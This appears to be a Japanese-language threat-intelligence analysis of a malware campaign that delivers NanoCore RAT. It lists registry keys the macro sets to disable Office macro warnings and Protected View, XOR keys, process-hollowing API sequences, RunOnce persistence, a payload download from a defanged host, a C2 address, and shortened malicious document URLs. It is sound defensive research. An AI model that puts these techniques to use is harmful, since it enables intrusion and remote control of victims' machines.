HKCU\\Software\\Microsoft\\Office\\15.0\\publisher\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\16.0\\publisher\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings

|----------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\11.0\\publisher\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\12.0\\publisher\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\14.0\\publisher\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\15.0\\publisher\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\16.0\\publisher\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\VBAWarnings HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\VBAWarnings |

また、マクロは、以下のレジストリ キーの値を1に設定して、Word、ExcelおよびPowerPoint内で保護ビュー機能によって提供される保護を無効化しようとします。  
HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV

|-------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 | HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\11.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\11.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\12.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\12.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\14.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\15.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\15.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\16.0\\PowerPoint\\Security\\ProtectedView\\DisableUnsafeLocationsInPV HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableInternetFilesInPV HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableAttachementsInPV HKCU\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\ProtectedView\\DisableUnsafeLocationsInPV |

#### 第1段階のペイロード

マクロによってインストールされるペイロードは、VB.NETで書かれたダウンローダー型トロイの木馬で、2次ペイロードとおとりのドキュメントをダウンロードします。このダウンローダーの作成者は、「Sales System Application」という名前のオープン ソース ツールのソース コードを使用したと思われます。このソース コードは、hxxp://www.a1vbcode\[.\]com/app-2999.aspで無料で入手できます。弊社は、このダウンローダーの作成者が「Sales System Application」を使用して、悪意のあるペイロードを合法的に見せかけたものと考えています。マルウェアの作成者は、独自のコードをこのアプリケーションに追加して、グラフィカル ユーザー インターフェイスを表示する正規の関数を呼び出す前に悪意のあるコードを実行します。アプリケーションがメニューを初期化しようとすると、以下の関数が呼び出されます。  
ETransaksi.Speed(); // Legitimate class, but method is the first wrapped function that leads to malicious code ProjectData.EndApp(); // Closes the application before rest of legitimate Sales System Application functions are called

|---------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 | ETransaksi.Speed(); // Legitimate class, but method is the first wrapped function that leads to malicious code ProjectData.EndApp(); // Closes the application before rest of legitimate Sales System Application functions are called |

合法的なETransaksiクラスの「Speed」メソッドには、Sales System Applicationの合法的なコードが含まれています。しかし、このツールの作成者は、このコードをif/else構造体に組み込み、falseのフラグを設定することで、これらの命令をバイパスし、合法的なコードをスキップして、次のステップに進み悪意のあるコードを実行させます。以下のコード例は、falseのフラグが設定され(5 \> 115)、ETransaksi.diomadnfagaghaghメソッドが呼び出される例を示しています。  
int num = 5; int num2 = 155; bool flag = num \&gt; num2; if (flag) { } else { NewLateBinding.LateCall(ETransaksi.diomadnfagaghagh(), null, "Invoke", new object\[\] { null, new object\[0\] }, null, null, null, true);

|----------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 | int num = 5; int num2 = 155; bool flag = num \&gt; num2; if (flag) { } else { NewLateBinding.LateCall(ETransaksi.diomadnfagaghagh(), null, "Invoke", new object\[\] { null, new object\[0\] }, null, null, null, true); |

ペイロードはこの技法を使用して、最終的に悪意のあるタスクを実行するメソッドのチェーンを実行します。前述した「Speed」メソッドを例外として、このチェーンで呼び出されるメソッドの名前は、以下のリストのようにまったくランダムのようです。

1. ETransaksi.Speed
2. ETransaksi.diomadnfagaghagh
3. ETransaksi.fjcsERIfjfiojsGHIsdifjksi
4. ETransaksi.gsgjIDJIGJIGJIGJIFDOSpl
5. ETransaksi.FJaioefgkaoeK

チェーンの最後の2つのメソッドが、1番目のペイロードの機能の大半を実行します。ETransaksi.gsgjIDJIGJIGJIGJIFDOSplメソッドは、「fgjfaieSDFAOKEfj.GSrdofjksrgj」という名前のリソースを取得します。これは、以下のキーを使用したマルチバイトXOR暗号によってETransaksi.FJaioefgkaoeKメソッドで復号されます。  
byte\[\] array = new byte\[\] { 19, 129, 43, 37, 56, 65, 255, 75, 111, 19, 211, 120, 0, 49, 126, 248 };

|-------------------------------------------------|---------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | byte\[\] array = new byte\[\] { 19, 129, 43, 37, 56, 65, 255, 75, 111, 19, 211, 120, 0, 49, 126, 248 }; |

結果として生成された平文は、別の.NETアセンブリで、これをペイロードが自身のプロセス スペース内にロードします。

#### 埋め込まれたトロイの木馬

1番目のペイロードによってロードされるこのトロイの木馬にはいくつかの埋め込み実行可能ファイルが含まれており、このファイルを使用して最終的に2番目のペイロードをダウンロードして実行し、おとりのドキュメントをダウンロードして開きます。未知のプログラマチック ビルダー ツールがこのトロイの木馬を作成したと思われ、コードは、この特定サンプルでは有効化されなかった追加機能用の複数の設定オプションを示しています。

実行されると、このトロイの木馬は、「BINDERON」で設定されたかどうかを確認し、リソース名「B」から埋め込みペイロードを抽出して、%TEMP%\\%BIND1%に保存し、埋め込みペイロードで新規プロセスを作成する必要があるかどうか判断します。トロイの木馬がこの活動を実行するように設定されていても、作成者は「B」リソース内にペイロードを埋め込まなかったため、この機能は何の活動も実行しません。例外が発生し、実行が続行されるだけです。

このトロイの木馬で見つかったもう1つの設定オプションは、「%STARTUPON%」のチェックです。このサンプルは、このオプションを有効にして実行するように設定されていませんが、もしこのオプションが有効に設定されていれば、トロイの木馬は、自らのコンテンツをbase64エンコード形式で以下のファイルに書き込んで、システムの特定の場所に自らをインストールしようとしたでしょう。

%APPDATA%\\Microsoft\\Windows\\DsvHelper\\%DECRY%.txt

そしてトロイの木馬は、%DECRY%.txtファイルの内容を読み取り、それらをデコードして、デコードしたデータを以下のファイルに書き込みます。

%USERPROFILE%\\APPDATA\\Roaming\\Microsoft\\Windows\\DsvHelper\\@RANDOM@.exe

次にトロイの木馬は、@RANDOM@.exeファイルを使用して新規プロセスを作成します。トロイの木馬が「DsvHelper」フォルダ内で実行可能ファイルとして実行されると、トロイの木馬は、ショートカット(.lnkファイル)を作成して、このショートカットを「DsvHelper」フォルダに保存します。次に以下のレジストリ キーを作成して、システムが始動するたびにトロイの木馬が自動的に実行されるようにします。

HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\@RANDOM@

このトロイの木馬が実行するメインの動作は、埋め込み実行可能ファイルを取得し、現在のトロイの木馬を空洞化し、新規の埋め込み実行可能ファイルをプロセス メモリーに書き込み、新しく作成されたペイロードで特定の関数を呼び出すことです。プロセス メモリーに書き込まれた埋め込みペイロードは、「R」リソースに存在し、新規のペイロードで呼び出される関数の名前は、「RPe.Test.Work」です。この関数は、最初のトロイの木馬に埋め込まれた別の実行可能ファイルを「M」という名前のリソースとみなし、以下のプロセスに挿入して実行しようとします。

C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe

cvtres.exeに挿入するように設定されていますが、トロイの木馬は、このコードを以下のプロセスにも挿入できます。

C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe

#### 埋め込まれたインジェクター型トロイの木馬

前述のRペイロードは、インジェクター型トロイの木馬に間違いありません。これは、実行可能ファイルへのパスと、プロセスに挿入するコードのバッファを、引数として受け取ります。Rペイロードは、CreateProcessA API関数を使用して、提供されたパスを使用して、プロセスを作成します。次にペイロードは、GetThreadContext API関数を使用して、新しく作成されたプロセスの基本アドレスを見つけ、NtUnmapViewOfSectionを呼び出して、プロセスを空洞化します。ペイロードは、VirtualAllocEx APIを呼び出して、新しく空洞化されたプロセスにバッファを作成し、WriteProcessMemory APIを呼び出して、挿入するコードが含まれた提供されたデータ バッファを、新しく作成されたバッファに書き込みます。ペイロードは、SetThreadContext APIを使用して、新しく挿入されたコードの入口にEIPを設定し、最終的にNtAlertResumeThread API関数を呼び出して、挿入されたコードを実行します。

#### 埋め込まれたダウンローダー型トロイの木馬

他のプロセスのメモリー スペース内に挿入され実行されたMペイロード(Rペイロードとともに前述)は、ダウンローダー型トロイの木馬です。この特定のダウンローダーは、VB2Exeツールを使用して作成されたと思われます。ダウンロード機能を実行する機能コードがペイロード内に埋め込まれたVBScriptとして存在するためです。このペイロードは、リソースからこのVBScriptを抽出して、別のリソースから抽出したファイルに保存します。VBScriptの保存に使用されるファイル名は「khm.vbs」で、最終的に「wscript」を使用して実行されます。VBScriptのSHA256ハッシュは、649e3922ec53d5b195ed23aac08148faeb561f47e891b1e6ff60a2a9df4fea17で、2つのPowerShellコマンドを呼び出して、ペイロードをダウンロードし、実行して、おとりのドキュメントをダウンロードし、開きます。ペイロードは以下の場所からダウンロードされ、「%PUBLIC%\\svchost32.exe」に保存されます。

hxxp://lokipanelhostingpanel\[.\]gq/work/kh/1s.exe

おとりのドキュメントは、hxxp://lokipanelhostingpanel\[.\]gq/work/kh/1.docxからダウンロードされ、「%PUBLIC%\\svchost32.docx」に保存されます。おとりのドキュメントが開かれると、以下の内容が表示されます。これには、画像と「Top civil-military body rejects Nawaz's controversial statement on Mumbai attacks」という表題の[ニュース記事](https://arynews.tv/en/nsc-reject-nawaz-sharif-mumbai-attacks-statement/)からコピーされたテキストが含まれています(以下のスクリーンショットを参照)。

![Gorgon\_17](https://unit42.paloaltonetworks.com/wp-content/uploads/2018/08/Gorgon_17.png)

図17: マルウェアによってダウンロードされたおとりのドキュメント

#### 最終ペイロード

最終ペイロードはドロッパー型トロイの木馬で、NanoCore RATをインストールします。このペイロード(SHA256: 690fc694b0840dbabb462ae46eb836777420b3354e53a6944a2e169b965b0bec)の作成者は、このツールのベースとして、「Saransh Email System」というオープン ソース ツールを使用していたと思われます。これは、hxxp://www.a1vbcode\[.\]com/app-4601.aspからダウンロードされたと考えられます。オリジナルのペイロード同様、このツールもif/elseステートメントを使用してSaransh Email Systemソースの合法的なコードをスキップして、悪意のある機能を実行します。オリジナルのツールと同じメソッド名を使用し、呼び出し順序も同じです。

1. Form1.Speed
2. Form1.diomadnfagaghagh
3. Form1.fjcsERIfjfiojsGHIsdifjksi
4. Form1.gsgjIDJIGJIGJIGJIFDOSpl
5. Form1.FJaioefgkaoeK

この関数のチェーンによって、最終的に「GSrdofjksrgj」という名前のリソースがロードされます。このリソースを、ツールが最初のペイロードと同じアルゴリズムおよびキーを使用して復号します。  
byte\[\] array4 = new byte\[\] { 19, 129, 43, 37, 56, 65, 255, 75, 111, 19, 211, 120, 0, 49, 126, 248 };

|-------------------------------------------------|----------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | byte\[\] array4 = new byte\[\] { 19, 129, 43, 37, 56, 65, 255, 75, 111, 19, 211, 120, 0, 49, 126, 248 }; |

復号されたペイロードのSHA256ハッシュは、5e805a88294f6d25d55103d19d13e798e01ad70e6b89e9c58db5d468cc63b3d5で、NanoCoreリモート管理ツールの亜種です。このNanoCoreの亜種は、TCPポート6666を介し、そのC2サーバーとして以下のIPアドレスと通信するよう設定されています。

115\.186.136\[.\]237

### Bitly短縮URLおよび拡張ドメイン

|-----------------------------------------------------|-------------------------------------------------------------------------------|
| **Bitly短縮URL**                                      | **拡張URL**                                                                     |
| http://bit\[.\]ly/Loaloding                         | http://www.asaigoldenrice\[.\]com/daq/doc/2.doc                               |
| http://bit\[.\]ly/Loadingnnsa                       | http://onedrivenet\[.\]xyz/work/docnew/4.doc                                  |
| http://bit\[.\]ly/2JmQLW6                           | http://stemtopx\[.\]com/work/doc/13.doc                                       |
| http://bit\[.\]ly/2JsruKm                           | http://stemtopx\[.\]com/work/doc/4.doc                                        |
| http://bit\[.\]ly/2GUaY49                           | http://fast-cargo\[.\]com/images/file/vb/VBS/doc/3.doc                        |
| http://bit\[.\]ly/Loadingnns                        | http://onedrivenet\[.\]xyz/work/docnew/4.doc                                  |
| http://bit\[.\]ly/2Im2IOF                           | http://panelonetwothree\[.\]ml/zico/doc/doc8/zloadings.doc                    |
| http://bit\[.\]ly/primeload                         | http://fast-cargo\[.\]com/images/file/vb/VBS/doc/1.doc                        |
| http://bit\[.\]ly/loader2018                        | http://asaigoldenrice\[.\]com/sim/new.doc                                     |
| http://bit\[.\]ly/2xZ1kO6wdscsac                    | http://stemtopx\[.\]com/work/doc/3.doc                                        |
| http://bit\[.\]ly/2M2bIYh                           | http://stemtopx\[.\]com/work/doc/root.doc                                     |
| http://bit\[.\]ly/2r9PSIv                           | http://stevemike-fireforce\[.\]info/work/doc/11.doc                           |
| http://bit\[.\]ly/Loadiendg                         | http://www.0-day\[.\]us/img/doc/6.doc                                         |
| http://bit\[.\]ly/2rpmJKsrdtrdtdfysersgerstrdFCGRDR | http://stevemikeforce\[.\]com/work/doc/7.doc                                  |
| http://bit\[.\]ly/2Fu4ZSfloading                    | http://panelonetwothree\[.\]ml/zico/xe/snoop/ocsnoop/snoop.doc                |
| http://bit\[.\]ly/2HloaderqVbva                     | http://diamondfoxpanel\[.\]ml/doc/1/11.doc                                    |
| http://bit\[.\]ly/Loardising                        | http://onedrivenet\[.\]xyz/work/docnew/12.doc                                 |
| http://bit\[.\]ly/2JB3KXD                           | http://stemtopx\[.\]com/work/doc/8.doc                                        |
| http://bit\[.\]ly/1\_loadingH7TvJa                   | http://diamondfoxpanel\[.\]ml/doc/1.doc                                       |
| http://bit\[.\]ly/Loadijging                        | http://onedrivenet\[.\]xyz/work/docnew/8.doc                                  |
| http://bit\[.\]ly/Laodiingplease                    | http://onedrivenet\[.\]xyz/work/docnew/13.doc                                 |
| http://bit\[.\]ly/2HvQBirEam832ASADx                | http://stevemike-fireforce\[.\]info/work/dola/3.doc                           |
| http://bit\[.\]ly/2I5T7b9hgvgvjcVYVY                | http://stevemikeforce\[.\]com/work/doc/6.doc                                  |
| http://bit\[.\]ly/paymentsuae                       | http://brevini-france\[.\]cf/xp/doc/swift.doc                                 |
| http://bit\[.\]ly/Laodingipleasewait                | http://www.asaigoldenrice\[.\]com/daq/doc/10.doc                              |
| http://bit\[.\]ly/loadingxxxx                       | http://www.asaigoldenrice\[.\]com/daq/doc/4.doc                               |
| http://bit\[.\]ly/2Gmziko                           | http://zupaservices\[.\]info/doc/z.doc                                        |
| http://bit\[.\]ly/2sQhJOO                           | http://stemtopx\[.\]com/work/doc/6.doc                                        |
| http://bit\[.\]ly/laodinfokqaw                      | http://stevemike-fireforce\[.\]info/work/doc/5.doc                            |
| http://bit\[.\]ly/loadrinfing                       | http://www.asaigoldenrice\[.\]com/daq/doc/15.doc                              |
| http://bit\[.\]ly/2JaBgAS                           | http://acorn-paper\[.\]com/administrator/help/7.doc                           |
| http://bit\[.\]ly/2loadingqlOQcM                    | http://diamondfoxpanel\[.\]ml/doc/4/44.doc                                    |
| http://bit\[.\]ly/loardding                         | http://fast-cargo\[.\]com/images/file/vb/VBS/doc/11.doc                       |
| http://bit\[.\]ly/loidaring                         | https://www.0-day\[.\]us/img/doc/5.doc                                        |
| http://bit\[.\]ly/LoadingPleaseWait                 | http://www.asaigoldenrice\[.\]com/daq/doc/20.doc                              |
| http://bit\[.\]ly/2HJv5Ud                           | http://stevemike-fireforce\[.\]info/work/doc/1.doc                            |
| http://bit\[.\]ly/Loading13                         | http://fast-cargo\[.\]com/images/file/vb/VBS/doc/13.doc                       |
| http://bit\[.\]ly/2Lzpjp1                           | http://stemtopx\[.\]com/work/doc/19.doc                                       |
| http://bit\[.\]ly/tt\_seafood                        | http://acorn-paper\[.\]com/administrator/help/en-GB/8.doc                     |
| http://bit\[.\]ly/Lording                           | http://fast-cargo\[.\]com/images/file/vb/VBS/doc/7.doc                        |
| http://bit\[.\]ly/loadingsmins                      | http://www.asaigoldenrice\[.\]com/daq/doc/1.doc                               |
| http://bit\[.\]ly/2\_loadingJwkhJA                   | http://diamondfoxpanel\[.\]ml/doc/7.doc                                       |
| http://bit\[.\]ly/Laodiingpleasesa                  | http://onedrivenet\[.\]xyz/work/docnew/13.doc                                 |
| http://bit\[.\]ly/2tnW5lu                           | http://stemtopx\[.\]com/work/newdoc/1.doc                                     |
